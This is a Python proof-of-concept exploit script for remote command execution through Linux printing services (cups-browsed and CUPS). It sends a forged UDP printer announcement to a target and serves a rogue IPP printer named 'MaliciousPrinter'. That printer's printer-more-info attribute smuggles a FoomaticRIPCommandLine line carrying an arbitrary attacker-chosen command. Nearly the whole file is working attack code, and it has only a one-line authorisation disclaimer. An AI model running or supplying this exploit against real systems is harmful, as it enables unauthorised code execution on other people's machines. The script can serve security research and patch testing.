#!/usr/bin/env python3
# Based off of EvilSocket's Exploit Script
# A few changes to make it more reliable
import socket
import threading
import time
import sys
from ippserver.server import IPPServer
import ippserver.behaviour as behaviour
from ippserver.server import IPPRequestHandler
from ippserver.constants import (
OperationEnum, StatusCodeEnum, SectionEnum, TagEnum
)
from ippserver.parsers import Integer, Enum, Boolean
from ippserver.request import IppRequest
class ServerContext:
    """Context manager that runs a server's ``serve_forever`` loop in a thread.

    On entry a daemon thread is started with ``server.serve_forever`` as its
    target; on exit ``server.shutdown()`` is called and the thread is joined.

    Args:
        server: Object exposing ``server_address``, ``serve_forever()`` and
            ``shutdown()``.
    """

    def __init__(self, server):
        self.server = server
        # Populated by __enter__; None until the context is entered.
        self.server_thread = None

    def __enter__(self):
        """Start the serving thread and return this context object."""
        # Read the address from the wrapped server rather than from a
        # module-level name, so the class works wherever it is instantiated.
        print(f'IPP Server Listening on {self.server.server_address}')
        self.server_thread = threading.Thread(
            target=self.server.serve_forever,
            daemon=True,
        )
        self.server_thread.start()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        """Stop the serving loop and wait for the thread to finish.

        Returns None, so an exception raised inside the ``with`` body is
        propagated to the caller.
        """
        print('Shutting down the server...')
        self.server.shutdown()
        self.server_thread.join()
def handle_signal(signum, frame):
    """Raise ``KeyboardInterrupt``; shaped like a signal handler callback.

    Args:
        signum: Accepted but not used.
        frame: Accepted but not used.

    Raises:
        KeyboardInterrupt: Always.
    """
    raise KeyboardInterrupt
class MaliciousPrinter(behaviour.StatelessPrinter):
    """Stateless IPP printer whose attribute list embeds a supplied command.

    Proof-of-concept code: only use against systems you are authorised to test.

    Args:
        command: String interpolated into the ``printer-more-info`` attribute
            value returned by :meth:`printer_list_attributes`.
    """

    def __init__(self, command):
        # Stored before the base initialiser runs, as in the upstream script.
        self.command = command
        super(MaliciousPrinter, self).__init__()

    def printer_list_attributes(self):
        """Build the printer attribute mapping returned to a client.

        Returns:
            dict: Keys are ``(SectionEnum.printer, attribute-name, value-tag)``
            tuples and values are lists of encoded byte strings. The result of
            ``minimal_attributes()`` from the base class is merged in last, so
            it takes precedence on any shared key.
        """
        supported_operations = (
            OperationEnum.print_job,  # (required by cups)
            OperationEnum.validate_job,  # (required by cups)
            OperationEnum.cancel_job,  # (required by cups)
            OperationEnum.get_job_attributes,  # (required by cups)
            OperationEnum.get_printer_attributes,
        )

        # The value closes the quoted attribute text, then continues with
        # lines naming FoomaticRIPCommandLine (carrying self.command) and
        # cupsFilter2. How the receiving side interprets these lines is not
        # visible in this file.
        more_info = f'"\n*FoomaticRIPCommandLine: "{self.command}"\n*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip'.encode()

        # One row per attribute: (name, value tag, values).
        # rfc2911 section 4.4
        rows = (
            (b'printer-uri-supported', TagEnum.uri, [self.printer_uri]),
            (b'uri-authentication-supported', TagEnum.keyword, [b'none']),
            (b'uri-security-supported', TagEnum.keyword, [b'none']),
            (b'printer-name', TagEnum.name_without_language,
             [b'Main Printer']),
            (b'printer-info', TagEnum.text_without_language,
             [b'Main Printer Info']),
            (b'printer-make-and-model', TagEnum.text_without_language,
             [b'HP 0.00']),
            # XXX 3 is idle
            (b'printer-state', TagEnum.enum, [Enum(3).bytes()]),
            (b'printer-state-reasons', TagEnum.keyword, [b'none']),
            (b'ipp-versions-supported', TagEnum.keyword, [b'1.1']),
            (b'operations-supported', TagEnum.enum,
             [Enum(op).bytes() for op in supported_operations]),
            (b'multiple-document-jobs-supported', TagEnum.boolean,
             [Boolean(False).bytes()]),
            (b'charset-configured', TagEnum.charset, [b'utf-8']),
            (b'charset-supported', TagEnum.charset, [b'utf-8']),
            (b'natural-language-configured', TagEnum.natural_language,
             [b'en']),
            (b'generated-natural-language-supported',
             TagEnum.natural_language, [b'en']),
            (b'document-format-default', TagEnum.mime_media_type,
             [b'application/pdf']),
            (b'document-format-supported', TagEnum.mime_media_type,
             [b'application/pdf']),
            (b'printer-is-accepting-jobs', TagEnum.boolean,
             [Boolean(True).bytes()]),
            (b'queued-job-count', TagEnum.integer, [Integer(666).bytes()]),
            (b'pdl-override-supported', TagEnum.keyword, [b'not-attempted']),
            (b'printer-up-time', TagEnum.integer,
             [Integer(self.printer_uptime()).bytes()]),
            (b'compression-supported', TagEnum.keyword, [b'none']),
            (b'printer-more-info', TagEnum.uri, [more_info]),
        )

        attr = {
            (SectionEnum.printer, name, tag): values
            for name, tag, values in rows
        }
        attr.update(super().minimal_attributes())
        return attr

    def operation_printer_list_response(self, req, _psfile):
        """Answer a printer-attributes request with the attribute mapping.

        Args:
            req: Incoming request; only its ``request_id`` is read here.
            _psfile: Unused.

        Returns:
            IppRequest: Built from ``self.version``, ``StatusCodeEnum.ok``,
            the request id and the attributes.
        """
        print("\ntarget connected, sending payload ...")
        response_attributes = self.printer_list_attributes()
        return IppRequest(
            self.version,
            StatusCodeEnum.ok,
            req.request_id,
            response_attributes,
        )
def send_browsed_packet(ip, port, ipp_server_host, ipp_server_port):
    """Send one UDP datagram announcing a printer URI to ``ip:port``.

    The datagram is a single space-separated text line: printer type (hex),
    printer state, printer URI, then quoted location, info and model strings,
    followed by a space and a newline.

    Args:
        ip: Destination host for the datagram.
        port: Destination UDP port.
        ipp_server_host: Host placed in the advertised printer URI.
        ipp_server_port: Port placed in the advertised printer URI.
    """
    print(f"Sending udp packet to {ip}:{port}...")
    printer_type = 2
    printer_state = '3'
    printer_uri = f'http://{ipp_server_host}:{ipp_server_port}/printers/EVILCUPS'
    printer_location = '"You Have Been Hacked"'
    printer_info = '"HACKED"'
    printer_model = '"HP LaserJet 1020"'
    packet = f"{printer_type:x} {printer_state} {printer_uri} {printer_location} {printer_info} {printer_model} \n"
    # The context manager closes the socket even if sendto() raises, so the
    # descriptor is not leaked.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.sendto(packet.encode('utf-8'), (ip, port))
def run_server(server):
    """Serve ``server`` inside a ``ServerContext`` until interrupted.

    The calling thread sleeps in half-second steps while the context is
    active. A ``KeyboardInterrupt`` raised during the wait ends it quietly.

    Args:
        server: Server object handed to ``ServerContext``; its ``shutdown()``
            is also called directly here.
    """
    poll_interval = .5
    with ServerContext(server):
        try:
            while True:
                time.sleep(poll_interval)
        except KeyboardInterrupt:
            # An interrupt only ends the wait; leaving the ``with`` block
            # performs the teardown.
            pass
    # A further shutdown request is issued once the context has exited.
    server.shutdown()
if __name__ == "__main__":
    # Usage: <script> <LOCAL_HOST> <TARGET_HOST> <COMMAND>
    # Proof-of-concept: only run against systems you are authorised to test.
    if len(sys.argv) != 4:
        print("%s <LOCAL_HOST> <TARGET_HOST> <COMMAND>" % sys.argv[0])
        # sys.exit is always available (quit() is a `site` convenience), and
        # a non-zero status signals the usage error to the caller.
        sys.exit(1)

    SERVER_HOST = sys.argv[1]
    SERVER_PORT = 12345
    command = sys.argv[3]

    server = IPPServer((SERVER_HOST, SERVER_PORT),
                       IPPRequestHandler, MaliciousPrinter(command))

    # Daemon thread: KeyboardInterrupt is only delivered to the main thread,
    # so a non-daemon worker would keep the process alive after Ctrl-C.
    threading.Thread(
        target=run_server,
        args=(server, ),
        daemon=True,
    ).start()

    TARGET_HOST = sys.argv[2]
    TARGET_PORT = 631
    send_browsed_packet(TARGET_HOST, TARGET_PORT, SERVER_HOST, SERVER_PORT)

    print("Please wait this normally takes 30 seconds...")
    seconds = 0
    try:
        # Simple elapsed-time ticker; runs until the user interrupts it.
        while True:
            print(f"\r{seconds} elapsed", end="", flush=True)
            time.sleep(1)
            seconds += 1
    except KeyboardInterrupt:
        # Exit cleanly instead of printing a traceback.
        print("\nInterrupted, exiting.")